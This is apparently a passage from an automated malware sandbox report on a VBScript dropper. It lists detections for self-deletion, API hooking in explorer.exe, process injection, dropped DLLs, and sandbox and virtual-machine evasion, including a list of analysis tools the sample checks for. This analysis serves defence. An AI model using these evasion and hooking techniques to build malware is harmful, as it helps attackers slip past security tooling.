            Source: Yara matchFile source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\2q4tlha5wbo1.vbsJump to behavior
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1819Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\marginal.roqJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 6024Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpn
            Source: RuntimeBroker.exe, 0000001F.00000000.810750161.0000027D4C640000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RuntimeBroker.exe, 00000020.00000002.912551846.000001B4F862A000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
            Source: mshta.exe, 00000011.00000003.746769025.00000164FEABF000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
            Source: explorer.exe, 0000001E.00000000.836872400.000000000FD75000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000001E.00000000.817397904.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: RuntimeBroker.exe, 0000001F.00000000.812442013.0000027D4E762000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
            Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: marginal.roq.0.drJump to dropped file
            Allocates memory in foreign processesShow sources
